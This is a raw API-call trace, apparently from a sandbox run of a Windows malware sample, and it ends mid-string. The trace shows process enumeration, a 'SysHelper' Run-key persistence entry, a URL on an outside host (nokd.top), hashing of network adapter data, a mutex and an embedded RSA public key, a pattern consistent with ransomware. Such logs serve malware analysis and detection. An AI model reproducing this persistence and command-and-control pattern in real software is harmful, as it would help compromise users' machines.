[0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x29c) returned 0x0 [0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x45c) returned 0x0 [0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x544 [0202.926] EnumProcessModules (in: hProcess=0x544, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0202.926] CloseHandle (hObject=0x544) returned 1 [0202.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x544 [0202.927] EnumProcessModules (in: hProcess=0x544, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0202.927] CloseHandle (hObject=0x544) returned 1 [0202.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x544 [0202.927] EnumProcessModules (in: hProcess=0x544, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0202.927] CloseHandle (hObject=0x544) returned 1 [0202.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a4) returned 0x544 [0202.927] EnumProcessModules (in: hProcess=0x544, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0202.927] CloseHandle (hObject=0x544) returned 1 [0202.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x0 [0202.927] CloseHandle (hObject=0x0) returned 0 [0202.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5e0) returned 0x544 [0202.927] EnumProcessModules (in: hProcess=0x544, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0202.934] GetModuleBaseNameW (in: hProcess=0x544, hModule=0x400000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="1A3E.TMP.EXE.exe") returned 0x10 [0202.934] CloseHandle (hObject=0x544) returned 1 [0202.934] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6d0) returned 0x544 [0202.934] EnumProcessModules (in: hProcess=0x544, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0202.936] GetModuleBaseNameW (in: hProcess=0x544, hModule=0x400000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="reader_sl.exe") returned 0xd [0202.936] CloseHandle (hObject=0x544) returned 1 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x77a020 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3242b88 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x324c348 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x325fc68 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x325fed0 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3260138 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32603a0 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3260608 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3260870 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3260ad8 [0202.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3253718 [0202.948] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d690 | out: phkResult=0x18d690*=0x544) returned 0x0 [0202.948] RegQueryValueExW (in: hKey=0x544, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d68c, lpData=0x18bdb8, lpcbData=0x18d670*=0x400 | out: lpType=0x18d68c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart", lpcbData=0x18d670*=0xe0) returned 0x0 [0202.948] RegCloseKey (hKey=0x544) returned 0x0 [0202.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xe0) returned 0x326f728 [0202.948] lstrlenA (lpString="\" --AutoStart") returned 13 [0202.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd0) returned 0x819f78 [0202.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x326f728 | out: hHeap=0x750000) returned 1 [0202.948] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe") returned 1 [0202.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd0) returned 0x81a050 [0202.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x819f78 | out: hHeap=0x750000) returned 1 [0202.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x3279708 [0202.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3253980 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3253be8 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3253e50 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32540b8 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3254320 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3254588 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3242f60 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32431c8 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3243430 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3243698 [0202.949] lstrlenA (lpString="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x5e) returned 0x82d328 [0202.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3253980, cbMultiByte=-1, lpWideCharStr=0x82d328, cchWideChar=47 | out: lpWideCharStr="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0202.949] lstrcatW (in: lpString1="", lpString2="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.949] lstrlenA (lpString="") returned 0 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f278 [0202.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3253be8, cbMultiByte=-1, lpWideCharStr=0x84f278, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.949] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.949] lstrlenA (lpString="") returned 0 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f298 [0202.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3253e50, cbMultiByte=-1, lpWideCharStr=0x84f298, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.949] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.949] lstrlenA (lpString="") returned 0 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f268 [0202.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32540b8, cbMultiByte=-1, lpWideCharStr=0x84f268, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.949] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.949] lstrlenA (lpString="") returned 0 [0202.949] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f308 [0202.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3254320, cbMultiByte=-1, lpWideCharStr=0x84f308, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.949] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.949] lstrlenA (lpString="") returned 0 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f2a8 [0202.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3254588, cbMultiByte=-1, lpWideCharStr=0x84f2a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.950] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.950] lstrlenA (lpString="") returned 0 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f2d8 [0202.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3242f60, cbMultiByte=-1, lpWideCharStr=0x84f2d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.950] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.950] lstrlenA (lpString="") returned 0 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f2c8 [0202.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32431c8, cbMultiByte=-1, lpWideCharStr=0x84f2c8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.950] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.950] lstrlenA (lpString="") returned 0 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f328 [0202.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3243430, cbMultiByte=-1, lpWideCharStr=0x84f328, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.950] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.950] lstrlenA (lpString="") returned 0 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2) returned 0x84f2b8 [0202.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3243698, cbMultiByte=-1, lpWideCharStr=0x84f2b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0202.950] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0202.950] lstrlenW (lpString="") returned 0 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x12) returned 0x773560 [0202.950] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x288) returned 0x32547f0 [0202.950] GetAdaptersInfo (in: AdapterInfo=0x32547f0, SizePointer=0x18d654 | out: AdapterInfo=0x32547f0, SizePointer=0x18d654) returned 0x0 [0202.966] GetAdaptersInfo (in: AdapterInfo=0x32547f0, SizePointer=0x18d654 | out: AdapterInfo=0x32547f0, SizePointer=0x18d654) returned 0x0 [0202.989] GetLastError () returned 0x0 [0202.989] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1000) returned 0x3255d68 [0202.989] GetLastError () returned 0x0 [0202.995] GetLastError () returned 0x0 [0203.004] CryptAcquireContextW (in: phProv=0x18d624, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d624*=0x7b1bd8) returned 1 [0203.040] CryptCreateHash (in: hProv=0x7b1bd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d62c | out: phHash=0x18d62c) returned 1 [0203.040] CryptHashData (hHash=0x7922f0, pbData=0x3252310, dwDataLen=0x11, dwFlags=0x0) returned 1 [0203.040] CryptGetHashParam (in: hHash=0x7922f0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d628, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d628) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x3272848 [0203.040] CryptGetHashParam (in: hHash=0x7922f0, dwParam=0x2, pbData=0x3272848, pdwDataLen=0x18d628, dwFlags=0x0 | out: pbData=0x3272848, pdwDataLen=0x18d628) returned 1 [0203.040] GetLastError () returned 0x0 [0203.040] CryptDestroyHash (hHash=0x7922f0) returned 1 [0203.040] CryptReleaseContext (hProv=0x7b1bd8, dwFlags=0x0) returned 1 [0203.040] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252310 | out: hHeap=0x750000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d5f8 [0203.040] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d7f0 | out: hHeap=0x750000) returned 1 [0203.040] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77d650 | out: hHeap=0x750000) returned 1 [0203.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x160) returned 0x548 [0203.285] WaitForSingleObject (hHandle=0x548, dwMilliseconds=0xffffffff) returned 0x0 [0204.562] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x558 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x32798b8 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3243900 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3243b68 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3243dd0 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3244038 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32442a0 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3244508 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3244770 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32449d8 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3244c40 [0204.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3244ea8 [0204.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x3f0) returned 0x32547f0 [0204.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x5f1) returned 0x7bb150 [0204.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x7bb150, cbMultiByte=1521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 498 [0204.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x600) returned 0x325e940 [0204.563] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bb150 | out: hHeap=0x750000) returned 1 [0204.563] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32547f0 | out: hHeap=0x750000) returned 1 [0204.572] CryptAcquireContextW (in: phProv=0x18d694, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d694*=0x7b1c60) returned 1 [0204.615] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d698 | out: phHash=0x18d698) returned 1 [0204.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0204.615] CryptHashData (hHash=0x3277ca8, pbData=0x325e940, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0204.615] CryptGetHashParam (in: hHash=0x3277ca8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d69c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d69c) returned 1 [0204.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x3272808 [0204.615] CryptGetHashParam (in: hHash=0x3277ca8, dwParam=0x2, pbData=0x3272808, pdwDataLen=0x18d69c, dwFlags=0x0 | out: pbData=0x3272808, pdwDataLen=0x18d69c) returned 1 [0204.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x34) returned 0x3277c28 [0204.615] GetLastError () returned 0x0 [0204.615] lstrcatA (in: lpString1="", lpString2="C2" | out: lpString1="C2") returned="C2" [0204.615] GetLastError () returned 0x0 [0204.615] lstrcatA (in: lpString1="C2", lpString2="2D" | out: lpString1="C22D") returned="C22D" [0204.615] GetLastError () returned 0x0 [0204.615] lstrcatA (in: lpString1="C22D", lpString2="9B" | out: lpString1="C22D9B") returned="C22D9B" [0204.615] GetLastError () returned 0x0 [0204.615] lstrcatA (in: lpString1="C22D9B", lpString2="95" | out: lpString1="C22D9B95") returned="C22D9B95" [0204.615] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B95", lpString2="40" | out: lpString1="C22D9B9540") returned="C22D9B9540" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540", lpString2="A5" | out: lpString1="C22D9B9540A5") returned="C22D9B9540A5" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A5", lpString2="66" | out: lpString1="C22D9B9540A566") returned="C22D9B9540A566" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566", lpString2="CF" | out: lpString1="C22D9B9540A566CF") returned="C22D9B9540A566CF" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CF", lpString2="E7" | out: lpString1="C22D9B9540A566CFE7") returned="C22D9B9540A566CFE7" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7", lpString2="B5" | out: lpString1="C22D9B9540A566CFE7B5") returned="C22D9B9540A566CFE7B5" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7B5", lpString2="6F" | out: lpString1="C22D9B9540A566CFE7B56F") returned="C22D9B9540A566CFE7B56F" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F", lpString2="54" | out: lpString1="C22D9B9540A566CFE7B56F54") returned="C22D9B9540A566CFE7B56F54" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F54", lpString2="25" | out: lpString1="C22D9B9540A566CFE7B56F5425") returned="C22D9B9540A566CFE7B56F5425" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F5425", lpString2="87" | out: lpString1="C22D9B9540A566CFE7B56F542587") returned="C22D9B9540A566CFE7B56F542587" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F542587", lpString2="A1" | out: lpString1="C22D9B9540A566CFE7B56F542587A1") returned="C22D9B9540A566CFE7B56F542587A1" [0204.616] GetLastError () returned 0x0 [0204.616] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F542587A1", lpString2="9C" | out: lpString1="C22D9B9540A566CFE7B56F542587A19C") returned="C22D9B9540A566CFE7B56F542587A19C" [0204.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3272808 | out: hHeap=0x750000) returned 1 [0204.617] CryptDestroyHash (hHash=0x3277ca8) returned 1 [0204.617] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0204.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.617] lstrlenA (lpString="C22D9B9540A566CFE7B56F542587A19C") returned 32 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x3f0) returned 0x32547f0 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x5f1) returned 0x7bb150 [0204.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x7bb150, cbMultiByte=1521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 498 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x600) returned 0x325e940 [0204.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bb150 | out: hHeap=0x750000) returned 1 [0204.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32547f0 | out: hHeap=0x750000) returned 1 [0204.617] lstrcpyA (in: lpString1=0x3249cb0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC 